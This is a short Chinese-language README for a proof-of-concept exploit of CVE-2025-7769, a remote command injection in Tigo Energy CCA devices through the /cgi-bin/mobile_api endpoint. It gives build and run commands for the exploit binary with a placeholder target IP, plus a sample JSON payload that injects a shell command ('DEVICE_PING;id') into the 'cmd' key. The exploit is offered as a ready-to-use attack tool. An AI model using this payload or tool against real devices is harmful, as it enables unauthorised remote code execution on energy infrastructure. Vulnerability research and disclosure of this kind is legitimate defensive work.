本仓库包含针对 CVE-2025-7769 的概念验证(PoC)利用代码,该漏洞是 Tigo Energy CCA 设备在暴露 /cgi-bin/mobile_api 端点时存在的一个严重远程命令注入漏洞。
该漏洞通过在 cmd JSON 键中注入操作系统命令触发,未经过滤的输入直接拼接到系统调用中,从而允许在设备上实现完全远程代码执行(RCE)。
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
将 10.0.2.15 替换为目标 IP。
如果你想传递完整的基 URL 而非 IP/端口,请使用 -u http://target.com。
示例负载:
{
"cmd": "DEVICE_PING;id",
"dev": 2,
"ver": 1
}
MIT 许可证